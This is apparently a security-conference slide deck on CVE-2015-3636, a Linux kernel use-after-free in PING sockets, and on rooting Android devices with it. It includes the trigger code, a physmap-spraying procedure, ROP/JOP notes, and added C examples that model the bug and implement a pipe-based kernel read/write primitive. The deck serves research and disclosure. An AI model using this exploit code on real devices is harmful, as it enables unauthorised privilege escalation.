SLIDE 1

Own your Android! Yet Another Universal Root

Wen Xu (xuwen.sjtu@gmail.com), Yubin Fu (QooBee1993@gmail.com)
Keen Team

Usenix Woot 15' 1

SLIDE 2

About Me

  • Security research intern at Keen Team
– Mobile vulnerability research
– Android rooting
– Software exploitation
  • Undergraduate student at Shanghai Jiao Tong University
– Research member of LoCCS

SLIDE 3

Introduction

  • Universal Android root solution by Keen Team
– CVE-2015-3636: a kernel use-after-free vulnerability
– Undocumented overwriting technique targeting kernel use-after-free vulnerabilities
  • Reliable
  • Universally applicable
– First 64-bit root case in the world
  • PingPongRoot
  • PXN bypassed by kernel ROP

SLIDE 4

Roadmap

  • Vulnerability (CVE-2015-3636)
  • Proof-of-Concept
  • Exploitation
– Goal
– Re-filling
– 64-bit devices
– Privilege escalation
  • Conclusion


SLIDE 6

Vulnerability (CVE-2015-3636)

  • Critical paging fault at 0x200200, an address that is not mapped in the kernel

SLIDE 7

Vulnerability (CVE-2015-3636)

  • sk: the PING socket object in the kernel (a struct sock living in the "PING" slab cache)

SLIDE 8

Vulnerability (CVE-2015-3636)

  • ping_unhash() calls hlist_nulls_del() on the same sk_nulls_node two times
– After the first call the node's pprev is LIST_POISON2 == 0x200200
– The second call stores through that pprev; 0x200200 is not mapped -> kernel crash

SLIDE 9

Vulnerability (CVE-2015-3636)

  • Invoke connect() in the user program two times
– sa_family == AF_UNSPEC: each such connect() disconnects the PING socket, and the disconnect path ends in ping_unhash()

SLIDE 10

Vulnerability (CVE-2015-3636)

  • Review ping_unhash()
– Map the page holding 0x200200 in user space to avoid the crash; the poisoned store then lands in our memory instead of faulting
– sock_put(sk)? It is reached a second time as well

SLIDE 11

Vulnerability (CVE-2015-3636)

  • sock_put(sk) twice -> ref-count reaches 0 -> sk_free()
  • A dangling file descriptor in the user program: the fd still refers to the freed PING socket object
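The mechanics of slides 8 to 11 in one place, as an added example that is not code from the slides: a user-space model of hlist_nulls_del() and of ping_unhash() before and after the fix. The list and unhash functions follow the shape of the 3.x kernel code; struct sock is cut down to the fields involved, and the poison pointer is aimed at an array we own instead of 0x200200 (which is what the mmap() on slide 10 achieves for real).

```c
/* Added example, not code from the slides: a user-space model of the
 * double ping_unhash() behind CVE-2015-3636. hlist_nulls_del() and the
 * two ping_unhash() variants follow the shape of the 3.x kernel code;
 * struct sock is cut down to the fields involved. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct hlist_nulls_node {
    struct hlist_nulls_node *next, **pprev;
};
struct hlist_nulls_head { struct hlist_nulls_node *first; };

/* In the kernel LIST_POISON2 is 0x200200 and normally unmapped, so the
 * second unhash faults. The model points it at memory we own, which is
 * what mmap()ing the page at 0x200200 (slide 10) achieves in the exploit. */
static struct hlist_nulls_node *poison_page[2];
#define LIST_POISON2 (&poison_page[0])

/* hlist_nulls lists end in a tagged "nulls" marker, not in NULL */
#define is_a_nulls(p) ((uintptr_t)(p) & 1)

static void hlist_nulls_add_head(struct hlist_nulls_node *n,
                                 struct hlist_nulls_head *h)
{
    n->next = h->first;
    n->pprev = &h->first;
    h->first = n;
    if (!is_a_nulls(n->next))
        n->next->pprev = &n->next;
}

static void hlist_nulls_del(struct hlist_nulls_node *n)
{
    struct hlist_nulls_node *next = n->next;
    struct hlist_nulls_node **pprev = n->pprev;
    *pprev = next;               /* on the 2nd call pprev == LIST_POISON2 */
    if (!is_a_nulls(next))
        next->pprev = pprev;
    n->pprev = LIST_POISON2;
}

struct sock {
    struct hlist_nulls_node sk_nulls_node;
    int sk_refcnt;
};

static int sk_hashed(const struct sock *sk)
{
    return sk->sk_nulls_node.pprev != NULL;
}

static void sock_put(struct sock *sk)
{
    sk->sk_refcnt--;             /* 0 means sk_free(): back to the PING cache */
}

/* Vulnerable ping_unhash(): no sk_hashed() guard, node never re-initialised */
static void ping_unhash_vuln(struct sock *sk)
{
    hlist_nulls_del(&sk->sk_nulls_node);
    sock_put(sk);
}

/* Fixed ping_unhash(): unhash and drop the table's reference only once */
static void ping_unhash_fixed(struct sock *sk)
{
    if (sk_hashed(sk)) {
        hlist_nulls_del(&sk->sk_nulls_node);
        sk->sk_nulls_node.pprev = NULL;   /* sk_nulls_node_init() */
        sock_put(sk);
    }
}

/* Hash one socket (refcnt 2: the file plus the ping hash table), then
 * unhash twice as two connect(AF_UNSPEC) calls do. Returns the final
 * refcount and reports whether a store went through LIST_POISON2. */
static int double_unhash(void (*unhash)(struct sock *), int *poison_hit)
{
    struct hlist_nulls_head head = { .first = (struct hlist_nulls_node *)(uintptr_t)1 };
    struct sock sk = { .sk_refcnt = 2 };
    memset(poison_page, 0, sizeof poison_page);
    hlist_nulls_add_head(&sk.sk_nulls_node, &head);
    unhash(&sk);
    unhash(&sk);
    *poison_hit = poison_page[0] != NULL;
    return sk.sk_refcnt;
}

int final_refcnt(void (*unhash)(struct sock *))
{
    int hit;
    return double_unhash(unhash, &hit);
}

int poison_written(void (*unhash)(struct sock *))
{
    int hit;
    double_unhash(unhash, &hit);
    return hit;
}

int main(void)
{
    printf("vulnerable: refcnt %d, poison page written %d\n",
           final_refcnt(ping_unhash_vuln), poison_written(ping_unhash_vuln));
    printf("fixed:      refcnt %d, poison page written %d\n",
           final_refcnt(ping_unhash_fixed), poison_written(ping_unhash_fixed));
    return 0;
}
```

With the vulnerable variant the second unhash writes through LIST_POISON2 and the refcount drops to 0 while the caller still holds the socket; the fixed variant refuses the second unhash because sk_nulls_node_init() cleared pprev.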


SLIDE 13

Proof-of-Concept

  • Works only on Android devices
– Android sets net.ipv4.ping_group_range so that any app may open SOCK_DGRAM/IPPROTO_ICMP sockets; stock Linux leaves the range empty ("1 0")

    int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    struct sockaddr addr = { .sa_family = AF_INET };
    int ret = connect(sockfd, &addr, sizeof(addr));
    struct sockaddr _addr = { .sa_family = AF_UNSPEC };
    ret = connect(sockfd, &_addr, sizeof(_addr));
    ret = connect(sockfd, &_addr, sizeof(_addr));


SLIDE 15

Exploitation: Goal

  • Control the content of the freed PING objects
  • close(fd) on the dangling descriptor then calls through the fake object (sk->sk_prot->close), hijacking the kernel's control flow


SLIDE 17

Exploitation: Re-filling

  • Difficulties of exploiting a UAF in the kernel:
– Slab allocator: objects of different caches are kept apart, so a freed slot is normally reused only by objects of the same cache
– Few candidates: little control over which kernel objects get allocated
– Multi-thread/multi-core: unpredictable kernel heap layout
– Content control: little control over the content of kernel objects

SLIDE 18

Exploitation: Re-filling

  • PING socket object in the Linux kernel
– Lives in a dedicated slab cache named "PING": sk_prot_alloc() does kmem_cache_alloc(prot->slab, priority & ~__GFP_ZERO), so the object is not zeroed on allocation
  • Object size varies between Android devices (it follows the ROM's struct sock layout)

SLIDE 19

Exploitation: Re-filling

  • Physmap, the direct-mapped memory, is the kernel region that maps all physical memory linearly, so a page backing a user-space mapping is also reachable at a kernel virtual address.
– ret2dir: Rethinking Kernel Isolation (USENIX Security '14) [1]

SLIDE 20

Exploitation: Re-filling

  • How to create it: iteratively mmap() in user space
  • Data control: fully user-controlled (fill the mmap()ed area with our payload)
  • The physmap pages holding the payload grow in number as the mappings take over free physical memory in the kernel

SLIDE 21

Exploitation: Re-filling

  • Size control: can be made large enough to fill any freed memory in the kernel, in theory
  • Exploit UAF bugs regardless of the type of the vulnerable object

SLIDE 22

Exploitation: Re-filling

  • Info leak by ioctl(): tells whether the overwriting is done or not
– A dword value inside the object is read back through the dangling fd

SLIDE 23

Exploitation: Re-filling

  • 1. Allocate hundreds of PING socket objects in groups.
– In each group, M padding objects surround N target objects, the ones that will be freed through the bug.
  • 2. Free the padding PING socket objects normally by calling close().
  • 3. Free the target PING socket objects by triggering the bug.
– Freeing both kinds empties whole slab pages, which leaves large pieces of free memory for physmap to take over.
  • 4. Iteratively call mmap() in user space and fill the areas.
– Payload + magic number, so that re-filling can be checked.
  • 5. Iteratively call ioctl() on the target PING socket objects.
– ioctl() returns the magic number? Done.
  • 6. Otherwise, further physmap spraying is needed.


SLIDE 25

Exploitation: 64-bit devices

  • The same exploitation strategy applies to 64-bit Android devices.
  • LIST_POISON2
– Remains 0x200200 on these kernels, so the poison page can still be mapped from user space
  • Physmap spraying is verified to cover freed SLAB cache pages on 64-bit devices as well.


SLIDE 27

Exploitation: Privilege escalation

  • For most 32-bit Android devices:
– Once pc is controlled, return to shellcode in user space (ret2usr)
– What does the shellcode do?
  • Leak the kernel stack address to get the thread_info address
  • Overwrite addr_limit with 0 to gain arbitrary kernel read/write (on 32-bit ARM, __range_ok() starts from addr_limit itself, so a zero addr_limit makes every access_ok() check pass)
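The two computations the slide-27 shellcode needs and the read/write primitive that a relaxed addr_limit buys, as an added example that is not the authors' shellcode. It assumes a 3.x ARM32 kernel layout: THREAD_SIZE of 8192, thread_info at the base of the kernel stack, and addr_limit at offset 8 (after flags and preempt_count); check these against the target's vmlinux. The pipe trick is the standard way to turn the kernel's own copy routines into a read/write primitive once addr_limit no longer bounds them; before the exploit runs it simply round-trips user memory, which is what the self-check exercises.

```c
/* Added example, not the slides' shellcode: the thread_info/addr_limit
 * arithmetic of slide 27 and the pipe-based read/write primitive that a
 * zeroed addr_limit enables. Assumes a 3.x ARM32 kernel: THREAD_SIZE 8192,
 * thread_info at the kernel stack base, addr_limit at offset 8. */
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

#define THREAD_SIZE      8192u   /* assumption: ARM32 3.x; arm64 uses 16384 */
#define ADDR_LIMIT_OFF   8u      /* assumption: after flags and preempt_count */

/* thread_info lives at the bottom of the current task's kernel stack, so
 * masking the leaked stack pointer with ~(THREAD_SIZE-1) locates it. */
uint32_t thread_info_from_sp(uint32_t kernel_sp)
{
    return kernel_sp & ~(THREAD_SIZE - 1);
}

uint32_t addr_limit_addr(uint32_t kernel_sp)
{
    return thread_info_from_sp(kernel_sp) + ADDR_LIMIT_OFF;
}

/* Once addr_limit no longer bounds copy_{to,from}_user (0 on 32-bit ARM,
 * where __range_ok() starts from addr_limit itself), a pipe turns the
 * kernel's own copy routines into an arbitrary read/write primitive:
 * write() copies from any address into the pipe, read() copies out. */
static int pipefd[2] = { -1, -1 };

static int pipe_ready(void)
{
    if (pipefd[0] < 0 && pipe(pipefd) < 0)
        return -1;
    return 0;
}

int kmem_read(uintptr_t src, void *dst, size_t len)
{
    if (pipe_ready() < 0)
        return -1;
    if (write(pipefd[1], (const void *)src, len) != (ssize_t)len)
        return -1;
    return read(pipefd[0], dst, len) == (ssize_t)len ? 0 : -1;
}

int kmem_write(uintptr_t dst, const void *src, size_t len)
{
    if (pipe_ready() < 0)
        return -1;
    if (write(pipefd[1], src, len) != (ssize_t)len)
        return -1;
    return read(pipefd[0], (void *)dst, len) == (ssize_t)len ? 0 : -1;
}

/* Self-check on user memory: before the exploit runs, the primitive must
 * at least round-trip addresses that addr_limit already allows. */
uint32_t roundtrip_u32(uint32_t value)
{
    uint32_t src = value, dst = 0;
    if (kmem_read((uintptr_t)&src, &dst, sizeof dst) < 0)
        return 0;
    src = 0;
    if (kmem_write((uintptr_t)&src, &dst, sizeof dst) < 0)
        return 0;
    return src;
}

int main(void)
{
    uint32_t sp = 0xc0a1b2c4u;   /* constructed: a leaked kernel sp */
    printf("thread_info = 0x%08x, addr_limit at 0x%08x\n",
           thread_info_from_sp(sp), addr_limit_addr(sp));
    printf("pipe primitive round-trip: 0x%08x\n", roundtrip_u32(0xdeadbeefu));
    /* After the shellcode zeroes *addr_limit, the same two calls with a
       kernel address read and patch kernel memory, e.g. the task's cred. */
    return 0;
}
```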

SLIDE 28

Exploitation: Privilege escalation

  • For many 64-bit devices, PXN (Privileged Execute Never) is enabled.
– ret2usr no longer works: the kernel cannot execute user-space pages.
– Kernel ROP is required.
– 2 ROP chains:
  • 1 for the leak
  • 1 for the overwrite
– Hardcoded gadget addresses per ROM

SLIDE 29

Exploitation: Privilege escalation

  • JOP (Jump-Oriented Programming) is preferred:
– Avoids stack pivoting in the kernel, which brings uncertainty
– Makes full use of the register values current at the hijacked call
  • The high 32 bits of kernel addresses are all the same
– Only the low 32 bits need to be read/written
  • Work hard to find good gadgets
– In some ROMs a single "GOD gadget" does both the leak and the overwrite


SLIDE 31

Conclusion

  • We propose a universally applicable attack strategy for use-after-free vulnerabilities in the Linux kernel.
  • We achieve root on popular Android devices on the market.
– First 64-bit root case in the world

SLIDE 32

Acknowledgement

  • Keen Team
– wushi
– James Fang
– Liang Chen
– Slipper
– Peter

SLIDE 33

References

  • 1. V. P. Kemerlis, M. Polychronakis, and A. D. Keromytis. ret2dir: Rethinking Kernel Isolation. USENIX Security Symposium, 2014.
  • 2. J. Oberheide and D. Rosenberg. Stackjacking Your Way to grsecurity/PaX Bypass. INFILTRATE 2011.
  • 3. https://www.kernel.org/doc/Documentation/vm/slub.txt
  • 4. V. P. Kemerlis, G. Portokalidis, and A. D. Keromytis. kGuard: Lightweight Kernel Protection against Return-to-user Attacks. USENIX Security Symposium, 2012.
  • 5. M. Prandini and M. Ramilli. Return-Oriented Programming. IEEE Security & Privacy, 2012.
  • 6. T. Bletsch, X. Jiang, V. W. Freeh, and Z. Liang. Jump-Oriented Programming: A New Class of Code-Reuse Attack. Proceedings of the 6th ACM Symposium on Information, Computer and Communications Security, ACM, 2011.

SLIDE 34

  • Thank you!
  • Q&A